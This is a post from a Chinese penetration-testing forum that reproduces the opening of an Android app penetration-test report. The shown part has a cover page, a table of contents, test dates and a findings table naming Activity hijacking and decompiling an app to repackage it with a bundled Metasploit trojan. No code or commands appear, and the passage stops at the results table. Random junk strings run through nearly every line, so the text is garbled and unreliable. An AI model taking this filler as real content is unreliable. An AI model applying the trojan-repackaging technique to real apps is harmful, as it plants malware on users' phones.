找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5252|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
3 _ U( N% {1 l 4 O" x! p0 c! X4 u. j; T$ p6 Z m

' |9 w$ `; x# ^8 a' P( K" |9 |& k2 @5 C
# A% o, R. y1 D R2 G J! } B & n! c# L6 G5 m% j- h

8 z$ L3 _. O0 u1 c+ u" \& _# K # R u/ w! C6 X. ]6 D$ A& K
$ V6 X1 S9 z X 3 e8 X. B( n n5 r8 J/ l

5 B9 C5 |# M2 s$ J6 d8 r& b 0 v: h I6 N* r& h5 x 文档编号:                / c: h- [ P& e, l" [1 w* g - Q) J" {" ?' v- f6 t, j

7 g* K7 F: o' H8 B% H$ a 9 U, I7 f! b3 s. i/ G

1 o7 H& J8 @; U& Q3 [: V3 t {! L3 @6 I/ T( L. w+ E' i/ {   ; q4 N1 G) e) @6 f8 d3 I& s 8 ~# S6 u1 G/ ^4 ?

. d: u- ]9 X+ v |: \ 4 l7 a0 H; ^( y' M7 x: X

d) |6 X# R$ u" | " Q, ~( Q }4 `; q& b) K* x   . w' C0 ?5 T7 B8 _: a# P& t3 K * D0 m$ `$ I3 @: N) D) X

/ P* w$ M* W8 ` , w# H% n( k/ I! v, {) A# `- F

! U( ^' ?/ B, ?# p) x 8 b$ A& w, ~) b# P   8 T3 Z6 A8 J( b- t, w % X3 _* ~) h2 H4 N0 I

. g& m1 M9 H* A% G w5 C+ ]9 V5 P' K8 _$ a6 _, B$ H, a. i6 p* ~

2 [; q$ C4 V% P ! ?- i3 F7 r$ @& T   " @* C% e+ _' B9 J- s1 y- T# U0 q8 V . e# R5 w3 l8 l0 O! t

' _/ N, ?; M3 u- T9 a & q0 x- j$ V6 s n& f- D, [

) k; S* b1 j/ T/ F( Y$ G , U* ?+ s( V% T+ F& ~ r   5 ]# I" S" [( U5 N7 m ) B/ q& s9 a- L! z& E

& P2 D# @7 D3 J1 {$ S+ L7 A7 V7 m1 [! t$ y- P3 T

* f/ L# h. v" s3 M# W 4 t: u5 d) M/ }! K 某某某APP渗透测试 & i+ Y U c2 Y3 E* p & i* S/ q7 x* P2 ~( a7 {( c6 L1 A

* ~3 q7 b6 P# c) R$ ^, `9 \2 y1 J x: d% Z4 j! f

2 w7 d; h% c9 y# V, ?6 u2 K$ k9 E* j* g% y' @) l. F   ' R. Z3 [2 ~7 `) k% h/ U' y$ @' @" c/ L8 k5 G) Z

" |5 B6 B# Q, V: @ @, g( C; X4 ^7 f- o) c/ o _

! c. `, r( {4 ^, [" Y# _- k+ v" J- s0 m6 \: V   ' e& |* X: i( P; U- {0 i: ^1 ^3 i, {3 F6 ~% a) C1 u

- m$ ?9 ^5 o6 n5 b" F6 y : Q4 E2 Q& p3 `5 z. ?2 o

2 B& c$ K6 T7 _0 i d% P; ^ 9 H1 G7 k# T9 V( q8 D8 G- M   5 M" o/ y2 x6 |! S; f { 7 Y7 k0 Q- ?) x, s( h

' j! {! l" v) M 2 ^0 i7 h, V$ x5 x

H+ Q1 u3 ]/ V3 O$ ] ! [( S( K6 z# [" m) O a: b   5 d4 o: ~* w A) {0 v) l 8 _. y4 z8 n6 V) \5 {

7 r2 G8 i# d1 u B; P& Z$ _0 h. w+ ~

7 J# ]7 p8 ?/ ^ 3 @# Q6 B. X* W: h, d 技 术 报 告 / d1 ]8 h3 i- n5 d 5 w) ]2 e. J. ^# o

& I2 I9 q5 X8 Y " e H6 R5 E2 [. P. e

$ j( F2 {2 Z. v: G( x4 t: j7 b # L' d; `0 R O) j) G   8 c# N/ {2 ~. {/ u4 P l ' h7 J _ j( k" X4 \

# o: b- b7 J2 C1 B: v+ Y5 H u* Q8 i

7 X( ~# p' {- [ o, g8 M: ~6 S5 |( ^   1 G! K8 S2 K8 A( v' y2 r2 J5 O ) X1 O# U1 T. w: l- }

/ {) {$ Z, u% M* u4 j 4 G; z( }; C: d1 R8 ?: q/ G

4 `9 W8 m8 k5 }( o8 e& L# I # L) }+ a0 K5 k: P3 x& A   , z* { k( F7 s, E y6 ]# g+ M2 X1 s8 a

* X. f* @2 L2 B$ K. M9 n, y, y) X& u 2 e( B: K7 O( L+ u& r1 Q

# k; w) V; C$ O 4 J6 Z, s* `/ y/ b$ p; z+ `   # h3 V" z4 H7 |" m; B : C$ W3 z: g: _; N+ P

( M0 a1 i# l6 Z- n! H( w& W* w8 e* I/ O0 x9 G

9 f- K2 f& k- ~ 6 e8 p2 n, X% |) S   3 ?: \" @* h& ]% Q* Z: J 7 x- _, |) D2 }. r' u5 ]' i/ E

+ I( M, p+ p7 {, W6 [1 E$ n1 {! y8 c+ k+ n4 l

9 |# @% V8 i; T( o" e0 w" k" X2 l" r! I1 y# s   6 n. a9 b$ ^7 K8 \5 P3 P# Z - W1 Y4 }" |0 W1 j8 J

7 a1 [+ i% N+ o) P3 c, W9 Y ) U: p0 k: q+ k! _; f1 h% ]

1 p" B, D$ T9 e' z9 U( _+ A9 i* I & P5 D5 T' S4 |+ W$ R   : r, h6 N8 ?! x x$ ] " i3 I' Z- T/ v; W4 }& C7 y( U! ^

5 v1 e; I& U9 ~% u/ U* z |5 y" o, ~' ]$ E. p( } \

9 L$ N! }! R' I - D0 u% U4 A( ?: e" [   " {- I) G3 O, H3 `. j; n $ c; i- m; Q. N, d# D8 J

0 R" L+ v# c0 V [' w, g* N8 o* B ! [% P& Y n& u- Q5 b

6 `' c G* S1 R0 E' U! j; P& ?) I4 r! ` h6 z   & v1 O. M5 g2 j+ w4 v " i1 V* b: L3 f

0 ?+ r- b6 Y( O 3 e' O* k0 w5 k- D& ]- E' V: q

1 R7 O& s2 A& M( b" T. z. u" T 3 D6 u9 d1 ]5 B9 c/ ^   7 T9 k/ [0 \6 D$ b0 G/ | ' s% d. }4 q8 i) B% Z

9 A7 t) d1 Y: `8 F2 \+ n% V . I" M$ Q9 X# W

5 O& Z: a [- L$ D ) A* W6 }1 ]; i8 o8 L& A" a8 e d   5 A. M' g7 C$ H4 F 0 m: @4 P& j) z! a4 t e a7 X

0 c* |( m0 E4 s$ |% d R+ X . i* s5 c& N% \( m# u" l6 g/ r4 V9 j

& d" s9 u$ _- O5 Y, s $ U5 ?/ S, }* p9 H) U$ ?   ' b" @, Y6 Z! ` , {- x$ [. o9 Y8 U1 p6 } j$ z. n: R

9 d7 z0 O/ i* w" A" m ; ^0 [$ q# C) f& N

. v& O2 r0 g. E$ |" f1 Q 7 t0 Q! a3 X% i   ; |2 Z' [( A; B( s e }8 K$ T9 d: c: N, p e

/ F, H- F t" u$ ~% K& K 0 h6 M$ ^+ X& [5 D, x% ]

! q5 r: @, J: Z6 q7 u ) w% `0 k4 v+ N" v   % A8 A6 U9 I6 G7 F1 c8 P! Z n! G 9 W- [1 @, v u3 j: T9 W! P

1 U, g1 h7 |+ P, E 2 S; E" ~* h: p

3 D% X- k* [0 y/ _( i ' \% [! x7 N" i, q' F   . V0 y# g+ n( T `2 C2 r5 Z- P7 j

" N P; q) h/ g% r9 n7 k" a ( c. t6 E7 R( l: z& E- u

/ R# ^% ~; a; R; p! f: Q + p9 r& f4 R, [   3 H5 v# E: ~! L* W 3 {0 a! ~! M! |& B/ H6 M

( T) X, \' I+ R6 R 5 O$ Z, ?/ N9 v" p4 | `

$ J; G* J/ ~: W1 {& c. H# |( `, H& f% k( t   0 c! A- l" x: ?0 Q1 V * y$ s3 U3 O: Y% s) ?* |

! F1 ?& Q4 ~* Z7 m * l9 r- B% x& k8 Z2 R+ m8 {

. _& w f! v8 p W" o1 j6 H! K4 ]6 s3 j+ ~; _, e! R   ' b0 O; L2 i( i) F- X( e ; ^5 h" j9 Z: }: X( h

( W0 ?) B1 I% `: |" U, J. K 3 X- s6 t, ^; v1 g8 W) l

- q: H; F7 e0 O* m+ B: Q9 d1 ~1 w 2 J6 F2 u: u% J6 } 二〇二〇年 + c4 l/ p7 P4 ^3 z- c 1 A$ S8 i# k: {: V) n7 t( a

( _ i3 H& d. J8 q+ X5 Q ' g J- ~& [4 j
y8 u1 e' W9 `3 Z) g 0 F% Z( w5 g* n
; ?- T( L+ p' P9 T+ D' D! C$ ` L0 o* {/ O2 D3 I( ` % A4 r0 k5 C# c& {' {3 b) @/ E . d: F0 `% v5 U4 Y, N7 g( I
4 y0 F3 ?" c8 y9 H6 O0 W3 |4 B* k& M! P( O* A
7 F( P$ W, L/ Y7 k+ g B: x, g/ j
4 A& g+ }" _/ |' p ! L0 y# O4 X W9 _ - p4 f" q( `$ I3 a' H, L8 x- o , l0 F, f' g1 h4 k: q
6 \" t4 c) a- k1 H# g% n; n ( b# T* l. a! ~; }% o6 |

1 }3 d; H) `& b( X 6 u2 w; n4 O7 L/ i# C0 r 目 录 7 K2 C$ h8 Y' k. ?4 n2 N5 y, Z% b% o4 l6 A( `% q

6 H. C; H3 ] ? ! U0 E6 t% T% n5 w8 |6 ]- F# J7 B$ N 7 E$ |! z% q2 @" h& i. Z( w$ f0 [/ K. t3 ?# D. |' P

6 {8 {9 N% {) L: K" ~ ! L) |# L3 u; p   4 f& C1 ~0 J2 G, F" A k ; k3 K- n9 k( P7 y& p1 v0 N7 A( g

2 {/ j6 r% h; |/ U" T* r4 E3 r % F9 p# p$ e4 q: ]- w

- N; K' A5 ?: k: Y: r7 o U3 Q' J3 F3 u6 z 1 概述... 3 4 X2 m. h' r- h* s! i 5 ]) K& R- }* Y6 s+ O) `

; z' `- L6 S' p. u , h/ P5 X$ t% n Q

& b5 i9 H9 Z- [9 b. }+ u: x; S" S1 q9 P% p5 J 1.2测试时间... 3 H |" z8 m+ b6 g+ O* f ; Z- B, D# j" p% ?/ o

# ?( p2 r1 X Y* s, k! p- t6 n+ a4 i D4 v- a( m

/ c' k8 O0 S9 f1 N. f. E3 [6 @ , [# m$ Z' z: S 1.3测试对象... 3 - \3 F8 {; v; S6 H; F- \/ Z; k% _: J: c- b3 [& L1 R6 t3 f

$ r" j( F v( ` k6 E 7 h8 a$ {6 n3 V2 G

6 S2 r7 P# m: ]/ [ . H" ^% B9 D) \* I6 Z( n: b8 K 1.4测试结果... 3 ( ]) Z0 F' }+ u7 M 6 h4 W( [1 s0 N3 f

# |# E/ L9 D; [5 _3 ? " n B# |2 K2 J1 n

( v' O: x% _. N0 G $ j0 `1 O7 k6 M# t! M 2 检测结果... 4 + e8 w- L) ^( |/ g1 P6 K 5 y: d6 i, i) p6 ], c" i

* l% o; N+ h `/ L& b' w) D4 l 6 V- w) ~/ ^$ w, O/ z

4 ?. b, t4 [0 \; u7 _ ]7 o1 [3 ^& c& H4 E7 S- \' m* s. `; z 2.1 某某某... 4 ! J% {- f( F% ~) @ # t2 A/ ^ a5 q9 q/ I' k8 C' |

! \$ l/ P# U5 F j! @8 k3 ^2 {; y 5 L' j. b n$ t

5 M5 ~* L+ X# i8 }8 K* C ) u( T; _4 J& Y0 Z$ C4 M 2.1.1检测目标... 4 ( b! k7 q6 ?0 X ' a& D- U8 j1 w. g! N

; @: H! \* H9 r0 ~ & q5 l( C( e6 ^2 [, |" s

3 Z( `# h4 F' C& ]% f* D 3 w( U' G9 ]2 ?; h8 A 2.1.2检测结果... 4 1 f: v$ x# O+ }" ~4 \7 w7 u; c! O' e

/ o' }* q8 A1 y- B. }- [. N9 N 3 C1 {0 _0 B2 h3 q" ]6 e4 \3 r

) z: a8 j! W0 U2 y. D. T5 [4 D/ r ; V3 E+ Y9 O' {" O 2.1.2.1. 4 7 U6 _2 Y4 {' h+ n : n% a {5 j6 i6 [* t. }; b2 |

2 r0 F4 r% p9 ?; ~, ~$ Z& |0 U8 X ' {# v0 _- `% T# v/ G

+ h# p4 z) s. {2 o0 u + |; {; _# R2 v. U N: U( N" A 2.1.2.2. 6 p( v9 J3 @$ E1 [. X9 o/ y* ?; Q3 U

0 q$ ~' n7 i" q * O: _/ f8 W7 @- R

8 m9 q! s- x3 v2 q; {, Q: a7 y, K+ C- r" E5 N 9 @+ X; P: W6 e5 U% J j! s* i4 ~" r0 L9 \+ K

# o8 K2 D) R& i" T; Y* K. P. o% N; U! l/ a/ S + e0 k' k) o _+ y8 p9 o* p + w! u3 W4 R6 G; R i
) q4 x1 c5 V- Y; q" \& {* L7 n M s
3 G' \) k9 [# U& G% v0 B * K6 h' A; e3 I- x# r8 c3 I " u! s6 w$ i; r8 s % J! u. z9 R; J& {' J c3 a: @ V

! q* R! N6 F5 l" x/ ~8 `; P0 C u! e/ B q' _ v7 m 1 概述 0 s# v+ y$ k5 H1 Y, \, F8 }: {3 k. B5 Q8 }/ X

9 \. P0 M7 ?/ @8 n8 m- T$ }5 B & M( k% I3 w- \- E& L

& `- u% z+ { Y& Z2 F( L8 V) u4 g- g- O) E [8 \ 1.2测试时间 # C9 W2 m3 K5 M- {: I) _ : ?: ~* @$ n- s2 s! U7 c

3 c5 p& p. W7 t# `- }. s& B* L$ \0 U' M( x + q/ `& T+ V* m2 _/ [, M0 K Y3 c# R" Q5 w. r# K3 V( S0 n- f: h- S x& J; z( R. S; ]5 v8 T9 g8 H* m9 `% ~" p' @1 ?0 c8 B& ]% S% l6 |" M7 y: `9 r; d% H) s1 I$ C* F, u) }) I& L2 S7 e H, r' R7 v6 L: M6 J) E% Y4 m, x) o) c8 J/ m: x8 K8 a: R$ K* S* s4 J- B! R8 A* S `8 v& w- k, r. o; `2 e# d* }. Q1 X3 C- q: V! M5 c' O+ u ~. O4 c) o9 f: }: q1 V7 q' \7 P+ @2 ?; E' O* a+ b: |8 ?& N( G o+ V& p, A: q, l0 u5 ?4 n7 C# C E( a$ U- U' ^* V8 l: ?6 G) Z- ~5 L7 p& e. A r3 {9 r% J2 Q3 L9 D8 d8 U3 L* }2 ?% s8 u1 b- D$ N$ e9 t, D P! g" A5 t0 t N( P; [' X% f' M; [# l' P! i2 I1 m: s6 `7 I2 ~. E% H, C3 R) E4 S0 z7 o- P* |+ c, T1 Y& ~5 Z) s8 b+ a9 G1 `. t' b% K8 Y1 F
5 _. S9 x* K$ o! @0 X % T* p& T& u2 _+ }, @

) s$ a8 Z# i" n / a0 `; f2 \* ~3 ^( w 渗透测试时间 . g0 v9 U8 v' Q2 u ( J E) }5 D: \8 h% T

: e* i* k& u5 [3 V3 x2 ^& {8 F1 r . f/ D* |/ V6 z( c
2 P9 E$ U1 t: _2 |* v- V7 L& U ' I/ g" |; W' x/ L. S% m

0 h1 K) ?4 w" M, y8 x% F" t / V; _5 z# P" K1 v% q* q5 o 起始时间 4 I. D$ p0 g' r 5 c K6 d; n h0 E0 d$ } O. \2 j

' \9 a$ a" d/ Z( h2 U$ D, I' I) E- b; I* W 		# @/ Y* U5 L, m/ V9 R , `0 G* g8 W* }- h

: N1 N& K. @- E- Y3 k# r8 y5 ^) v) L! h* o 202046 $ Q& W. T6 h, H' U" Q2 y; Q( ^ 9 k: c; c. b6 f f, w

1 Z ^& r9 x9 L t2 O* K- _7 ^1 i5 O$ m) ?3 H4 p5 ] Q
1 w, d r2 E/ v% y9 K) [ - g7 C. L2 J9 A

. G0 {, \3 t: i# f : Y7 s9 j2 ?: W9 G 结束时间 |6 L# @% o" i) g& V; \ & c2 l' U- X6 z' A' ~/ Q: J

! ~* q6 U& W9 M3 J . v5 [. X- W9 H- I# w: t3 x( ^ 		' |- |2 A a. Z5 |* B; ~( q' A3 h' e! m8 @4 Y+ _4 j, n

I( A3 P* V+ V: r% @3 f6 `$ d4 ^ F- B9 m6 k, B4 d 202049 $ y+ q& z- a( s- z! q A7 m5 ?: V+ }% F1 H$ ]: q; W

7 W+ E4 q, R- }1 x* F! P / I. H( ]( @1 G* U; B$ U4 j
6 m. D; Z! q" _6 j3 \# I& @ 7 I! W. q5 W1 P

3 f: {! I9 h" ^) g- J 8 ~# a% U* H9 C/ G 1.3测试对象 ) \$ E. O1 Z6 a- m1 s: Y0 @# [" Q % l9 }: W- Q' Z% k0 S$ P( C, k3 S

* V7 J' P9 [5 Y, u 5 L# ]/ Z0 _0 S, t

: Y" N( E: x9 k. H; }1 M " R7 }' K! ]6 P8 J& _ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: & D0 R$ R! E) \' i2 I + W6 l7 l9 N+ _; a/ k

9 C% _! [' }5 E6 ? ! [$ X: l, ~( X! n

% k+ B% y/ q# S6 o1 m/ @0 Q2 Q& u ( D$ ]$ W1 x2 H 1-1 检测对象 0 O/ E9 a0 B6 W4 M# e& [8 w, H a( ^# n/ y( O+ Z0 N+ L% K Q

# M; E7 D; S7 u 4 j6 w" j0 v2 U, @ F$ r0 I |( w1 f+ L/ J, P( a7 ?! x; x5 \9 p. f& z# S( J! p6 c P k3 d' Z6 q9 q W7 l+ [: W: P! `3 T& F* m0 x$ q1 W: b" t0 B8 O& J: N/ s3 L* _& d+ V8 F5 y. l9 Z2 s" h" Z6 h9 A9 Z0 i0 Z& c0 ?( n: M! c+ ~3 D, D7 }1 t; M) g# T% A; e% B+ k- f. m5 x9 a$ Q7 c+ ] C( t8 N5 b3 E5 l2 k# Q& L5 O, d% @ s, ^8 E3 K7 \) p( V" x+ X5 J5 l7 A0 ?. s6 _; Q/ S G( a* H$ T3 E4 J; H" i6 n9 j9 {; M2 o; U* b8 W% `0 f5 c; l! m, M1 ], ]( S; {+ M# Z4 c5 _- g& e6 @; u! T' i. a" A5 X1 w8 p8 Q s1 v" [1 H* C, j( b& P9 t' {0 E: \9 I! L/ N9 S: s: x4 d2 b: u+ I3 V% H4 Y% w- L1 V. [' g: C) J$ {& x, w) U- a- S4 j P8 q( T; o3 x( `: w9 S J8 C, N+ ^7 k" Q) z+ l, y* ]6 I( W9 M- R2 K5 K* ~, b) n4 V7 L( O+ |( ]5 m, ~/ Y/ V
4 G) E5 A4 L! u& C' V% t 5 Y L+ i) ]7 T2 |; X0 t

0 r$ Y" R& Z9 D1 N ( U( K) Z3 c6 I) a* c- A 序号 7 E8 ]3 n7 g/ [5 i* z; T) X$ k0 K1 u) \* e/ V' F) p

: e3 i5 Q' a$ }7 y9 Z( p& P 5 }" D4 z" G5 n. z, \5 K. `- Z 		( Z; h( f. Z, w! ^. E6 X 4 S% a0 |. D3 e' M& ?

9 z8 h& o$ b9 ] 5 F, W0 ?. Z- j* w 测试对象 z! l4 T4 ~6 j; }1 I 2 N! c5 Y/ U. h

, k8 G7 s/ y, _! H. z: ] ) N* a+ ~. Y' f7 o 		p! a+ \3 c! @ 4 u4 ] ?0 P2 j) S% x6 i

) ~) K+ @6 s$ j2 S1 d$ e$ A 6 A: f, ?" m* T& c) H" v 测试地址 ! O D. S W" x% e3 w3 D- a+ ? ( A5 _- R' S1 y

* F% O" I. e) p6 [ ! C- U+ Z6 L6 j Z- ^7 w 		: d, L# \! m2 @2 Q% a- ~* {5 V9 u ( V, C6 C; D5 H& l

6 ?/ y" i8 o7 c8 C & N, F7 I! ^+ k% Y 安全漏洞 T3 }: [6 y1 Z" ]4 e/ N9 Z 2 I. X. Q) q8 f5 w. H3 |- S9 f

2 [" L- k2 e6 P+ O- L+ d P8 @ * D7 `* _' u. u% R
; d' o' J" l; [' J / Z- ]5 {; B9 ~. ]7 W) W

) c) a) b: Y. {7 l+ | : u' l! h& V# d 1 $ `7 M, o2 T0 b K3 J/ i& l ; ~( Z2 c6 |7 b( e- M- g

, c9 c0 }3 w# |! Y. [; n+ d0 F1 j% @+ h) G9 O0 v& i 		2 ~3 \/ u5 n- v9 b! a+ H) v+ ^$ _9 x, Z1 t8 q

) b2 S C% r q7 r1 X4 d |: t7 ~" Q( y$ y7 o( f5 J; S$ I 某某某安卓APP 1 d5 j2 m# }! W: Y% i: J3 o' g4 g+ H, N5 g0 L3 ^

" ^% {4 o3 P3 w% U' y( n% g* \( J. s; H! i 		+ V0 a1 t# \* ~% S/ B$ B$ x8 r& C , K1 {& _; u1 h9 h. ^

, l n" s) y6 v* ?9 j ) H5 c) K |& J# X: V   ; a( Y5 m, g2 H5 A" i) ^! S5 d" U- A) a

- J! h9 Y7 q( _. W% y ) g4 D8 A& d: h) W. L" I& e 		7 u- z/ m2 \1 V/ X 3 E: A/ g$ H8 K' O

& Y2 C0 y8 ?" A# e% d* E - E8 v" d. t- a9 x- p2 K8 o; d; M 2 - J$ Q8 Q# m g+ E& i* G$ k* K / ]+ Q' I, h1 Q9 A2 D! K

# V+ t a7 k4 Y( X: V | 8 G' M, T. y! O& r
9 Z* ?3 k* Q' x5 K. Z: _ . v4 K& i N- U h3 y$ G% ]% S

) F; n8 O S5 t( o) |2 C/ S 8 n2 E* |8 V) m; \5 K7 P D ^, U 1.4测试结果 - c% \: I0 ~7 _) b* J% d # G% I% E# v8 p: u( W1 ?. a

% n; _' V6 g6 F* \ 1 n6 W9 B* _- g' F( K- U

' |9 p$ g9 ~$ L . d" S" q7 g! O+ O) B, S 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: * }/ ^; ^0 C1 f& E" N 5 i( l( Y8 F6 x! i

+ w: P1 e) h" w7 I, s; n0 ?- G Y1 [

1 T: O8 N# a: ~$ K& s 5 M [$ C5 Q6 U9 |   h. p% U& |, H' g% h/ d' p ; \7 ~! Z/ Q% b* Y( e2 S, d0 z

) r$ n4 _" {# i0 ]5 m ( x- g V% [3 c
$ u3 W5 y% ?7 f4 l: w/ y; ? c5 y7 u 6 [/ ]6 K# c T& v, L* ?( b6 z2 B4 x9 d! u) B) f6 E! j6 I3 W5 X+ d0 _) j* J8 F+ x4 Q0 t5 `8 a4 X0 U0 n7 Y6 a8 v& r: J+ q8 _) t# B- U& @2 R/ `4 N' _2 e% L4 D* f r# T- |7 ^8 ? z4 F7 E7 i) C3 H* g9 Y1 {- ]0 r& I2 q) D3 Z. v* e1 y. M! r, ~& ~" T- {2 i& x+ P8 u0 j W( d7 [; d- e: y/ N1 i0 k" ^- `* ~9 A8 F. K# `% ?; Q5 U) G2 A* Y3 ~5 Q v; ?* _) Z0 u& N) I7 O6 _$ p! V* X! H/ L; r2 d3 k! @# z# z3 W+ |; x8 N/ A: e: {% u V6 _1 |0 q; p; X& { h( S8 ]5 g' ]6 m8 I: t6 ~* r+ {* G# Q% I1 ]# O! I7 s6 `0 e2 D M2 l2 w. G+ g4 _: }4 A' ~* h7 I& r4 W8 u. ]$ B, Z' D3 ~9 u' Y, ]7 C( K4 o5 o7 A4 r" J# V- f( W1 S0 H: W$ w- b& K3 x4 K" |, Z& x: l, T& d4 d" s2 J/ E# B9 o: P6 h1 M9 t1 l3 f3 D- E z+ |6 g! E- y. c( O) ?5 g5 d2 B4 Q% q! b" ~8 W8 @2 b s- @* E: N6 E5 B$ T6 F7 l8 p. _; d* I* Z: j% S V! P( h/ p/ m1 w: ^5 f* d% L0 R) o2 j; {) d1 ^9 k" y2 R) }& }$ b7 Y2 J# @5 k6 s& r6 Q$ ~' g2 g5 d& s" p* m+ J# U- c B* A( x: @* b2 z) F( V6 d0 \) C$ X- B) d: \- S" y" t' d2 j) K' J9 o2 P; E, }# X5 Q/ A/ n; t% N: }' L+ d% h) U( d0 T9 Z V9 G: _1 K) d% L- B; X* D. I& J$ D3 t) S0 L9 ~: v0 v6 h" ?/ w! i \3 g4 p0 d# n2 ?0 Y7 q v8 U# D( S( k+ N2 B& X6 n( k i; s
3 [$ `6 Y1 U7 z; D7 ^4 x / K( L" V% u4 n- i

( u$ R0 v3 N" ~7 d4 Y' ~ X" l: C / w( [1 } z' M4 z }! E+ i3 q& Q 序号 5 O3 K5 C4 @9 c- J ; ~+ Q6 X, k8 ~' ]

6 p8 K* X0 _& E1 H 3 \8 \' F' Q' Q( Q9 Q. A* `$ @$ | 		+ V& \6 k8 L0 G# K# x: s, X & _8 B+ g8 ~# f' }' n- y

8 X4 i6 w4 c* E) t( `( f% g( g- k& P6 S5 O+ A# a L 系统名称 % V) i' F( j4 ^6 A& G Z! k$ ~5 `7 ~ b# E- Q

( J" N4 P5 Q/ Z % p0 T) s; h2 W! u2 k 		+ @6 d$ v% N' b% x 5 E. Y$ ^& J. s5 R+ O; X, m

l9 ?# p9 d$ X2 n5 y$ n - C3 ?) p; e, y3 Z0 v" t4 F9 }" u8 e 漏洞名称 ! l: H1 ]) n5 g : `* d8 {, ^ D6 y) u) s$ e

1 `4 B1 V- p: \ ^( ~+ _+ v0 o # i9 {+ ^8 S& L8 i 		: d5 I; [( y: N5 d 8 ?, }7 a3 T- q

& ~# s# @0 A* Q0 S$ x1 s" u- r8 a, W/ r4 H 漏洞危害 & c; b9 t; Z' X6 ]; P+ Q4 Y, [" l! l' r: O7 A8 P: e* g, y

& w# C( E$ M0 j5 h ) {3 @$ X& F" m: y9 j, R( `0 F' h 		f# ` Y& \+ D- b( O* u F3 M$ f, \. y6 M+ P- P& i

. f6 D0 _( q7 _' v+ Q' ]& y 5 n4 R9 d7 O$ p+ p% O 修复结果 1 |2 O( @+ c2 D9 d& ? . a9 ]/ g; Q1 M" T8 a

& ^* c4 H5 u. E. R5 w# C" q3 A' D, v4 _6 `" X
6 ?4 m; s6 p! r$ F8 e, H5 u% Z2 a/ j9 F" }1 r# V

: O( O P3 ~4 Y5 ?3 z0 {7 n: @$ n: h1 P& b A: _) k 1 ' o7 N5 J5 E5 x$ r+ T3 h- ]( ] % o) N" v2 Y. U* S: f! q* r

% ~3 I( ]( n6 I8 \( k / q# b5 R1 s- ?5 b! Q 		, w C* d/ V. |$ S; U2 {7 z 7 u1 M0 K6 c+ d/ }

! m8 S7 M* k" j1 ~2 Z( G & `: T, z; }, \' m4 l4 F 某某某某某某APP 2 Q6 G: W8 k8 ^9 e- p + Y8 V2 H; m9 q( E3 l& B x

7 g2 c+ A5 A1 p, L) V/ w " n/ h9 o3 a+ c; J; D0 H" n 		& Z7 S; g0 E: Q( }5 G; R 4 M8 l: `) V2 w( Q; u! O; p9 C

6 ]2 @5 X; {# {2 G! g / F0 k4 E/ p( m Activity 劫持 1 Q% _2 ?' ~9 T5 o# | ( T. V$ n* l4 `9 g% _

5 d) v$ `. i, x& {1 ^/ } 8 {5 T1 c; ]# V

* o3 g2 B/ K/ A' l, L 0 P& N* o: J _! y   ) ]! v. z- \& X! x ! n, N; m' K1 A- M+ V- I

+ y, f3 N; X2 y8 \0 j 8 R6 q% S& |% _2 \* y* N; o0 m V 		$ J! d5 V6 s2 Q : n$ W" n6 M9 C4 v' m7 S& x; ~8 |

9 p- I0 ^! k5 }0 G+ @4 { 0 X$ s. p: M4 Q1 v1 R8 @, G . b1 L# N4 A; C2 W ! X: i' ^ J% F6 Q1 d

- N* {5 u% J# v 5 @: s" M) N( c 		* c/ ~9 r2 O+ K2 n5 E4 |$ }6 g; \2 w8 h8 ^

: p8 o9 b% \ z( Z 1 w! K; U6 F3 \6 e$ R6 V! U   , b6 ]- o( a/ {2 _! d) h2 c $ H( Y1 k; A; N0 } ]

4 A1 s& r# |. ^+ G7 Y. s4 G- U + _: m+ R) ]; v" y0 P
& a( K* a1 V1 y7 S2 ~9 w, ~# W3 s 9 K# I3 I$ E/ d# B, O

, C, s3 r* {9 j: @/ R" R/ ~; y! P $ Z( F1 \; b4 R) o9 g+ h 2 ) Y* L' T* I1 K5 y7 d - P9 m! X, W, M: y5 M5 F% W0 D) R6 T' ~

& t! i) N' m; V- T, } ( }5 y- u5 ?$ C 		4 i! v9 v( ?) C/ e" v* o) @# ^ 4 t* p& U( G, D% K9 w+ D

7 v {! z- C( y2 _6 K) l0 V 4 [# d1 e# m% X 某某某某某某APP 8 N& \. f L* T" U& e* U! S) g9 y* t$ s2 H! b+ C4 b; ]

: b" [6 @; |9 U ( q4 x9 p9 q) c1 I 		B' G! y8 o: d7 }! [- K' _* ~. F6 A8 G$ w. b

M; P% Q5 j+ e8 G: M' Q- t3 F + ~5 d& O9 @0 B8 `8 J; t" f# z 反编译二次打包捆绑木马、篡改APP代码 . K- Z+ ^, D/ |8 I v3 J 2 V' `$ Q X: R% Z* C4 @

) M: S* ]% Q7 g- \ ( M8 _1 W( W+ g# O5 q! @ 		9 G* q- G# _6 L: g% X6 C% @; u, C; p8 J% U P- v

8 d6 A& O& y: M: v! T W4 e0 ~0 K* z" ~2 F6 m7 i' u" B& c4 L 3 a; G u* V! p: Q. G. G* o {2 z8 E9 R0 X; o

2 n0 W& a8 v, ?6 [, y8 ^ / ]- V8 f9 [% \4 S+ j$ P5 \: v 		, r! V5 m2 X9 x4 a; p, U 4 o0 A* V, f% Q( H* |8 p

* O2 n( {6 n" F0 {) Q. X 6 n* E! J# J, S* ~   - a9 b5 d% z, o+ U 1 d- S& G6 e" i3 G% S) V

; c) z+ g6 N4 r! F( {. I 7 q5 O% z" }8 G. v9 c. l1 g. e% c
1 Z [: ?) L( T% d# l( f5 L, n8 P 9 b0 e `) Z% N6 }; t0 \
+ k7 }; Z9 `4 \5 k9 B2 A4 p: Q$ v. p% ^ ( R/ [3 T# |" I) c5 n

9 Y$ y9 K @6 L# r$ Q 7 x, Y: z1 H) p( l9 K   / g- C6 m- Q6 M3 Q / O: I; B+ ]1 K; c5 d; }

" Q" S8 @3 E+ u" ` 0 A) M' y: E0 }! C, u# }

: ]+ t5 a. {7 U9 J$ f7 I/ j/ a/ |: W 1-2 测试结果 : g3 f2 D$ r6 X: { " j H! n/ P. j3 q' ?( F; x

8 a$ G, n; @2 I& V * O- O7 x z$ X

